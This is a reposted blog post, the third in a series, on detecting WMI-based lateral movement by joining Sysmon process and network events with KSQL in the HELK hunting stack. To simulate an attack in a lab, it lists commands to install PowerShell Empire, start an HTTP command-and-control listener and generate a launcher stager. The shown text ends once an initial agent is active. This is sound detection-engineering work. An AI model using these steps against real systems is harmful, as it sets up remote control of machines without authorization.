未加星标

Real-Time Sysmon Processing via KSQL and HELK―Part 3: Basic Use Case

字体大小 | |
[系统(windows) 所属分类 系统(windows) | 发布者 店小二05 | 时间 2019 | 作者 红领巾 ] 0人收藏点击收藏

Real-Time Sysmon Processing via KSQL and HELK―Part 3: Basic Use Case

In theprevious post, I shared a Sysmon-Join KSQL recipe to join events 1 and 3 in real-time, push the results to an Elasticsearch index, and interact with it via its Kibana web interface and index pattern. In this post, I will show you how all this can be helpful while hunting for certain lateral movement events.

This post is part of a three-part series. The other two parts can be found in the following links:

Real-Time Sysmon Processing via KSQL and HELK ― Part 1: Initial Integration Real-Time Sysmon Processing via KSQL and HELK ― Part 2: Sysmon-Join KSQL Recipe :book: Basic Lateral MovementThoughts

When talking about lateral movement, I initially think about authenticated remote code execution using legitimate credentials from a s ource system to target system for the following basic scenarios:

Gather information directly from the endpoint Move or copy a resource over the network. Create a new process to launch a new agent on the target system

From the basic scenarios shown above, the one that I like to explore the most is the last one (A new agent spawned on a target system). This is because I find it very interesting to track authenticated remote code execution that creates a process followed by a network connection to an external entity. Now, this might be common in your environment, I know. There are several applications that might do just that. However, there are certain legitimate built-in features in windows systems that are commonly used by attackers for remote code execution that might not be as common as you might think it is in your environment. This is the case of Windows Management Instrumentation (WMI) that can be used to create a new process on a remote system that could subsequently make a network connection to an external resource.

What isWMI?

WMI is the Microsoft implementation of the Web-Based Enterprise Management (WBEM) and Common Information Model (CIM). Both standards aim to provide an industry-agnostic means of collecting and transmitting information related to any managed component in an enterprise. An example of a managed component in WMI would be a running process, registry key, installed service, file information, etc. At a high level, Microsoft’s implementation of these standards can be summarized as follows: Managed Components Managed components are represented as WMI objects ― class instances representing highly structured operating system data.

Microsoft provides a wealth of WMI objects that communicate information related to the operating system. E.g. Win32_Process, Win32_Service, AntiVirusProduct, Win32_StartupCommand, etc.

Lateral Movement viaWMI

One well known lateral movement technique is performed via the WMI object ― class Win32_Process and its method Create . This is because the Create method allows a user to create a process either locally or remotely. One thing to notice is that when the Create method is used on a remote system, the method is run under a host process named “ Wmiprvse.exe ”. The process Wmiprvse.exe is what spawns the process defined in the CommandLine parameter of the Create method. Therefore, the new process created remotely will have Wmiprvse.exe as a parent.

How does KSQLhelp?

The basic behavior that we are looking for is a process spawning a new process that makes an external network connection . In the last post, we were able to join Sysmon event 1 (ProcessCreate) and Sysmon event 3 (NetworkConnect) in real-time. The result allows us to have context not only about a process making an external network connection, but the parent process that initially created the process calling out to the Internet. This is very helpful for our basic detection use case.

Empire: lateral_movement/invoke_wmi Module

For this post, we will use the invoke_wmi module from the Empire Project to simulate a suspicious lateral movement via WMI. This module executes a stager on a target system in order to communicate with the attacker’s C2 and handle the staging protocol.

Use CaseScenario Adversary compromises a domain system with IP address 192.168.64.178 Adversary has rights to access another domain system named DESKTOP-LFD11QP with IP address 192.168.64.137 Adversary’s C2 IP address is 192.168.64.84 (I was running everything in my own laptop so the C2 has an internal IP address. In a more realistic scenario, the C2 IP would be an external IP address) Adversary decides to move laterally from 192.168.64.178 to 192.168.64.137 via WMI spawning a new agent on the target system Requirements: Two Windows systems (Target system running Sysmon) PowerShell Empire server (invoke_wmi module) Ubuntu box hosting latest HELK build running the Sysmon-Join KSQL recipe Monitor for NewMessages

Monitor for any new messages matching the statements defined in our Sysmon-Join KSQL recipe and being published to the SYSMON_JOIN stream/topic. You can use the KSQL command PRINT as shown below:

PRINT SYSMON_JOIN; Initiate Empire git clone https://github.com/EmpireProject/Empire.git
cd Empire
sudo ./setup/install.sh
./empire Set upListener listeners
uselistener http
set Host http://192.168.64.184:80
execute
Real-Time Sysmon Processing via KSQL and HELK―Part 3: Basic Use Case
Use Stager usestager multi/launcher set Listener http execute
Real-Time Sysmon Processing via KSQL and HELK―Part 3: Basic Use Case

Copy the Powershell command returned. Run the Powershell command on your Source System (192.168.64.178) . You will get an initial agent active in your Empire server.


Real-Time Sysmon Processing via KSQL and HELK―Part 3: Basic Use Case

本文系统(windows)相关术语:三级网络技术 计算机三级网络技术 网络技术基础 计算机网络技术

代码区博客精选文章
分页:12
转载请注明
本文标题:Real-Time Sysmon Processing via KSQL and HELK―Part 3: Basic Use Case
本站链接:https://www.codesec.net/view/628165.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(windows) | 评论(0) | 阅读(74)